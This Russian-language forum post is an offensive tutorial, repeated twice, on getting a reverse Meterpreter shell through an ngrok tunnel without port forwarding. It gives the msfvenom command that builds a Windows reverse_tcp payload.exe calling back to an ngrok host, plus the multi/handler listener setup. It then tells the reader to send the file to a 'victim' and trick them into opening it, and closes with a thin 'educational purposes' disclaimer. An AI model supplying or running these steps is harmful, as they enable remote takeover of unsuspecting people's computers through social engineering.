Metasploit - одна из лучших сред тестирования безопасности, которая помогает тестировщикам делать больше, чем просто обнаруживать проблемы и выявлять уязвимости; он также готовится и вооружает защитников, чтобы всегда оставаться на один или два шага впереди игры.
Metasploit Framework - это набор инструментов для генерации и запуска кодов эксплойтов на локальном или удаленном целевом компьютере. В Интернете существуют тонны учебников по использованию различных уязвимостей. Но большинство из них ограничены в локальной сети. Чтобы сделать что-то полезное, один из них выходит за пределы локальной сети.
Большинство наших машин не будут напрямую доступны из Интернета, так как они находятся в локальной сети за маршрутизатором. По умолчанию он не разрешает входящий трафик из Интернета в локальную сеть. Для этого необходимо включить перенаправление портов. Порт. Пересылка - это механизм, который используется для перенаправления соединения с внешнего устройства для доступа к службам на устройстве в локальных сетях / частных сетях. Для этого вам следует настроить маршрутизатор, что может быть невозможно, если вы находитесь в офисной сети. Так что с этим делать?
Что если я скажу вам, что мы могли бы перенаправить соединение из Интернета на компьютер в частной / локальной сети без добавления правил брандмауэра или переадресации портов?
Metasploit вне локальной сети без переадресации портов
В этом посте мы обсудим атаку на устройство с помощью metasploit framework, чтобы установить обратное TCP-соединение с устройства жертвы на нашу локальную машину без переадресации портов.
Шаг 1 - Настройка Ngrok
ngrok - это удивительный сервис, позволяющий нам установить соединение с машиной или службой, работающей на машине, которая находится внутри локальной сети или расположена через Интернет без переадресации портов или добавления каких-либо правил брандмауэра. Это поможет нам подключить нашу машину-жертву для установления обратного TCP-соединения с нашим слушателем, даже если наша машина находится в нашей локальной сети.
Первое, что нужно сделать, это установить и настроить ngrok на нашей машине Kali. Для этого выполните шаги 1, 2 и 3 в следующем уроке. Вы можете сделать намного больше, используя Ngrok.
Шаг 2 - Запуск Ngrok
Теперь давайте запустим ngrok на TCP-порте; скажем, 9999. Слушатель Metasploit будет прослушивать порт 9999 для входящих обратных соединений TCP.
Как только вы выполните эту команду, вы увидите нечто вроде этого:
Forwarding tcp://0.tcp.ngrok.io:19631 -> localhost:9999
Это означает, что весь трафик 0.tcp.ngrok.io через порт 19631 через Интернет будет перенаправлен ngrok на порт 9999 на нашей машине. Оставь это работающим.
Шаг 3 - Создание полезной нагрузки
Теперь запустите другой терминал и создайте полезную нагрузку с вышеупомянутыми LPORT и LHOST. Используйте приведенную ниже команду для ее создания.
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 0.tcp.ngrok.io LPORT = 19631 -f exe> payload.exe
Здесь я использовал полезную нагрузку windows, но вы можете создать полезную нагрузку для любой ОС, включая android, предоставив вышеупомянутые LHOST и LPORT.
Шаг 4 - Запустите Metasploit Listener
Как только полезная нагрузка сгенерирована, вы можете запустить metasploit и настроить прослушиватель с помощью приведенных ниже команд.
Как только вы запустите 'эксплойт', metasploit запустит прослушиватель на порту 9999 на вашей машине, который будет следить за любым входящим обратным TCP-соединением.
Шаг 5 - Запустите полезную нагрузку
Теперь все, что вам нужно сделать, это отправить этот файл своей жертве, которая работает на компьютере с Windows, и обманом заставить его открыть файл.
Вы получили оболочку ...
Отказ от ответственности: это только для образовательных целей. Любые действия и / или действия, связанные с материалами, содержащимися на этом веб-сайте, являются исключительно вашей ответственностью. Неправильное использование информации на этом веб-сайте может привести к уголовным обвинениям против указанных лиц. Авторы не будут нести ответственность в случае предъявления каких-либо уголовных обвинений лицам, злоупотребляющим информацией на этом веб-сайте, чтобы нарушить закон.
Metasploit Framework - это набор инструментов для генерации и запуска кодов эксплойтов на локальном или удаленном целевом компьютере. В Интернете существуют тонны учебников по использованию различных уязвимостей. Но большинство из них ограничены в локальной сети. Чтобы сделать что-то полезное, один из них выходит за пределы локальной сети.
Большинство наших машин не будут напрямую доступны из Интернета, так как они находятся в локальной сети за маршрутизатором. По умолчанию он не разрешает входящий трафик из Интернета в локальную сеть. Для этого необходимо включить перенаправление портов. Порт. Пересылка - это механизм, который используется для перенаправления соединения с внешнего устройства для доступа к службам на устройстве в локальных сетях / частных сетях. Для этого вам следует настроить маршрутизатор, что может быть невозможно, если вы находитесь в офисной сети. Так что с этим делать?
Что если я скажу вам, что мы могли бы перенаправить соединение из Интернета на компьютер в частной / локальной сети без добавления правил брандмауэра или переадресации портов?
Metasploit вне локальной сети без переадресации портов
В этом посте мы обсудим атаку на устройство с помощью metasploit framework, чтобы установить обратное TCP-соединение с устройства жертвы на нашу локальную машину без переадресации портов.
Шаг 1 - Настройка Ngrok
ngrok - это удивительный сервис, позволяющий нам установить соединение с машиной или службой, работающей на машине, которая находится внутри локальной сети или расположена через Интернет без переадресации портов или добавления каких-либо правил брандмауэра. Это поможет нам подключить нашу машину-жертву для установления обратного TCP-соединения с нашим слушателем, даже если наша машина находится в нашей локальной сети.
Первое, что нужно сделать, это установить и настроить ngrok на нашей машине Kali. Для этого выполните шаги 1, 2 и 3 в следующем уроке. Вы можете сделать намного больше, используя Ngrok.
Шаг 2 - Запуск Ngrok
Теперь давайте запустим ngrok на TCP-порте; скажем, 9999. Слушатель Metasploit будет прослушивать порт 9999 для входящих обратных соединений TCP.
Код:
./ngrok tcp 9999
Как только вы выполните эту команду, вы увидите нечто вроде этого:
Forwarding tcp://0.tcp.ngrok.io:19631 -> localhost:9999
Это означает, что весь трафик 0.tcp.ngrok.io через порт 19631 через Интернет будет перенаправлен ngrok на порт 9999 на нашей машине. Оставь это работающим.
Шаг 3 - Создание полезной нагрузки
Теперь запустите другой терминал и создайте полезную нагрузку с вышеупомянутыми LPORT и LHOST. Используйте приведенную ниже команду для ее создания.
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 0.tcp.ngrok.io LPORT = 19631 -f exe> payload.exe
Здесь я использовал полезную нагрузку windows, но вы можете создать полезную нагрузку для любой ОС, включая android, предоставив вышеупомянутые LHOST и LPORT.
Шаг 4 - Запустите Metasploit Listener
Как только полезная нагрузка сгенерирована, вы можете запустить metasploit и настроить прослушиватель с помощью приведенных ниже команд.
Код:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 9999
exploit
Как только вы запустите 'эксплойт', metasploit запустит прослушиватель на порту 9999 на вашей машине, который будет следить за любым входящим обратным TCP-соединением.
Шаг 5 - Запустите полезную нагрузку
Теперь все, что вам нужно сделать, это отправить этот файл своей жертве, которая работает на компьютере с Windows, и обманом заставить его открыть файл.
Вы получили оболочку ...
Отказ от ответственности: это только для образовательных целей. Любые действия и / или действия, связанные с материалами, содержащимися на этом веб-сайте, являются исключительно вашей ответственностью. Неправильное использование информации на этом веб-сайте может привести к уголовным обвинениям против указанных лиц. Авторы не будут нести ответственность в случае предъявления каких-либо уголовных обвинений лицам, злоупотребляющим информацией на этом веб-сайте, чтобы нарушить закон.
Ссылка скрыта от гостей
Последнее редактирование: